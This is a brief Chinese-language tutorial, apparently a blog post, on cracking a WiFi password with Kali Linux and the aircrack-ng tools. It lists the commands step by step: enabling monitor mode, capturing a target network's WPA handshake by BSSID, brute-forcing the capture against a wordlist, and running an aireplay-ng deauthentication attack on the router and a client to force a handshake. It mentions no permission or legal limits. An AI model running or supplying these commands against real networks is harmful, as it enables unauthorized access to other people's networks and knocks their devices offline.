kali linux 通过跑包的方式破解wifi密码

1. wlan0开启monitor mode    :    airmon-ng start wlan0

2. 查看附近的无线网络     ： airodump-ng wlan0mon   

3. 抓取无线网络数据包    ：    airodump-ng -c 6 --bssid F0:B4:29:29:8A:03 -w name wlan0mon   （当出现handshake时说明抓包成功）

　　　　-c  :  CH的值  ； --bssid : BSSID的值 ； -w : 存放抓取数据包的文件名

4. 通过密码字典文件暴力破解该无线网络的密码    ：    aircrack-ng -w /usr/share/wordlists/sqlmap.txt name-01.cap

5. 关闭无线网卡的monitor mode    :    airmon-ng stop wlan0mon 

 

  如果在步骤3，我们一直抓不到握手包 ， 可以攻击一下无线路由，

　　a)  新开一个terminal 

　　b) aireplay-ng -0 1 -a F0:B4:29:29:8A:03 -c 08:ED:B9:89:FB:B1 wlan0mon

　　　　-0 : 采用deauth攻击模式，后面加攻击次数，1-10 即可

　　　　-a : 路由器的mac地址

　　　　-c : 客户端的mac地址  （我们在步骤2看到的STATION下面的值就是某一个路由对应的客户端）